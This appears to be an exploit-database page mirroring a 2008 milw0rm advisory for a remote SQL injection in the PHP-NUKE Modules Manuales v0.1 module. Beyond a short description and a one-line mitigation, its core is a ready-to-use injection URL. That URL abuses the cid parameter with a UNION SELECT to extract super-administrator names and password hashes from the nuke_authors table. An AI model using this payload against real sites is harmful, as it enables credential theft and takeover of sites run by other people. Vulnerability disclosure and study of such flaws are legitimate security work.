header-logo
Suggest Exploit
vendor:
Modules Manuales
by:
xoron
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Modules Manuales
Affected Version From: v0.1
Affected Version To: v0.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP-NUKE Modules Manuales v0.1 Remote SQL Injection

A remote SQL injection vulnerability exists in PHP-NUKE Modules Manuales v0.1. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

PHP-NUKE Modules Manuales v0.1 Remote SQL Injection

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

contact: xorontr@gmail.com (only e-mail)

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Thanx: str0ke,

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

# milw0rm.com [2008-02-21]

Navigation

Suggest Exploit

Services By CQR